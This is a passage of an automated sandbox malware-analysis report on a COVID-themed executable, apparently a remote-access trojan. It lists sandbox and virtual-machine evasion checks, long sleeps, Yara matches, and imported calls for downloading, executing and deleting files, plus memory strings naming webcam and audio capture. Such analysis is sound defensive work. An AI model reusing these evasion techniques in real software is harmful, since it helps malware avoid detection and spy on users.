Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: SBIEDLL.DLL
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp Binary or memory string: MSBIEDLL.DLL
Yara detected Beds Obfuscator
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
Contains functionality to detect virtual machines (IN, VMware)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00401102 in eax, dx 28_2_00401102
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe TID: 6364 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe TID: 6396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760 Thread sleep time: -15679732462653109s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040376Fh 28_2_0040374A
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040376Fh 28_2_0040374A
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4713
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4309
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU? 28_2_0040BEA2
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: WerFault.exe, 00000022.00000002.466462532.0000000005400000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW.
Source: dwnl.exe, 00000021.00000002.497205914.0000000000E92000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: WerFault.exe, 00000022.00000002.466462532.0000000005400000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000022.00000002.466462532.0000000005400000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWHEB
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.429455278.0000000000C98000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp Binary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?playaudiodatafmt WAVERIFF.wav%Y-%m-%d %H.%MgetcamsingleframenocamerastartcamcapclosecamgetcamframeinitcamcapFreeFrameGetFrameCloseCameraOpenCameracamdlldatacamframe|dmc|[DataStart][DataStart]0000%02i:%02i:%02i:%03i [KeepAlive] Enabled! (Timeout: %i seconds)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs 28_2_00402C45
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 28_2_0040BC9B
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all 28_2_00403183
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose, 28_2_0040F234
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@